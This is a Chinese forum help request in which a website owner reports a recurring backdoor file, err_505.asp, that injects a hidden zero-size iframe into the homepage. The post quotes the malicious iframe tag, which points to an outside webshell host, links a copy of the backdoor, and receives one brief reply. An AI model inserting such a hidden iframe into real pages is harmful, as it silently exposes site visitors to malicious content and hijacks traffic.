高考问答咒乐园 null:网站安全紧急求救?
来源:百度文库 编辑:高考问答 时间:2024/05/10 07:57:02
我公司做了个行业网站http://www.xi78.com 但最近发现有人在网站中增加了一个文件err_505.asp,该文件主要是在网站首页文件中增加代码,这个代码是为某个网站带来流量的。在文件中增加的代码是:<iframe width=""0"" height=""0"" frameborder=""0"" scrolling=""no"" src=""http://webshell.cardb.cn/hinet.htm"" name=""loginf""></iframe> 我多次删除这个文件err_505.asp,但过一段时间,这个文件又出现在服务器空间上了。为了能让大家全面了解这个文件,我将该文件的全文贴在这里:http://www.xi78.com/err_505.rar 实际上这是一个后门插入程序文件。也是一个网站在线编辑器,(大家可以将文件下载看看吧!)对网站的文件可以全部浏览,甚至可以编辑,修改和删除。太可怕了!我想请问各位高手。这个文件是怎么载入服务器空间上的,我该怎么来防止它再次加到我的服务器空间上?如果能解决这个问题的朋友我将再赠送积分!
关闭你的后门``他跟你的网页传了一个木马,上传方法很简单`所以你需要手动关闭后门``要不就很容易进去的!
工欲善其事,必先利其器